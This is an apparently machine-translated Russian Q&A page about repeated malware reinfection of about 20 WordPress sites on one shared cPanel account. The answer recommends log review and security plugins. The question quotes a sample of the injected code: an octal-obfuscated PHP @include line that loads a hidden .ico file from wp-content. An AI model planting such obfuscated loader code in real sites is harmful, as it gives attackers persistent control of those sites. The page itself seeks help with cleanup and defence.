Несколько сайтов WordPress продолжают получать взлом на одном хостинге

Question

Вот проблема.Я размещаю около 20 веб-сайтов Wordpress на 1 хостинге.В то время как я очищаю один веб-сайт от вирусов (файл .ico, вводящий код в index.php), другие уже очищенные веб-сайты вводятся снова (в течение нескольких часов или дней).

Решение сделать резервную копию всех баз sql и удалить все файлы - не будет работать для меня - потому что на некоторых веб-сайтах есть мои небольшие пользовательские скрипты (ничего особенного, только небольшие изменения в html,почти уверен, что я не создал какую-либо уязвимость по ошибке)

Итак, мои вопросы:

1. Возможно ли разделить домашние каталоги в cPanel, чтобы каждый веб-сайт былотделены друг от друга?

2. если нет, изменение разрешений в файловом менеджере, например, на 544, остановит редактирование файлов?

3. Любоедругие решения о том, как навсегда удалить этот хак и все бэкдоры?

Потому что сейчас единственное решение, которое я вижу, это скачать 1 сайт, удалить все файлы, просто оставьте wp-папку содержимого и темы, установите новый WordPress на новый хостинг и оставьте его там.Но все равно будет немного дороже купить 20 разных учетных записей хостинга.

Было бы очень полезно для любых идей!

PS Пример введенного кода в index.php

/*73c7c*/

@include "\057h\157m\145/\164i\156y\164o\162r\057s\141m\160l\145s\162.\165s\057w\160-\143o\156t\145n\164/\1673\164c\055c\157n\146i\147/\0568\062d\1441\1468\145.\151c\157";

/*73c7c*/

Answer 1

Вы должны проверить логи и посмотреть, какую уязвимость использует злоумышленник.Если вы просто очистите, переустановите WordPress и так далее, эти сайты всегда будут взломаны.Вы должны найти уязвимость и сделать что-то, чтобы исправить ее, чтобы она не была взломана снова.Вы действительно не можете разделить веб-сайты, так как они находятся в одной учетной записи cPanel, поэтому, если они принадлежат одному и тому же пользователю, не имеет значения, в какой папке они находятся, или если у них разные папки.

Я бы установил плагин Wordpress для обеспечения безопасности, такой как Sucuri, Wordfence или BulletProof Security.Эти плагины улучшают безопасность вашего WordPress, добавляют некоторые настройки и некоторые дополнительные настройки безопасности, чтобы предотвратить подобные атаки.У них также есть инструменты аудита и ведения журналов, чтобы вы могли лучше понять, что именно представляет собой уязвимость и, возможно, как ее исправить.

Я бы пошел с BPS для начала и посмотрел, как она работает.Он добавляет довольно много правил в ваш файл .htaccess, правил, которые улучшат безопасность вашего сайта WordPress и защитят от различных видов атак, инъекций xss / css и т. Д.

Wordpress - это отличная CMS, но потому что онаШироко распространенный, он, вероятно, является одной из самых целевых платформ для ботов, сканеров, сканеров, хакеров и т. д. Обычно Wordpress взломан или взломан из-за темы или плагина, неправильных прав доступа к файлам.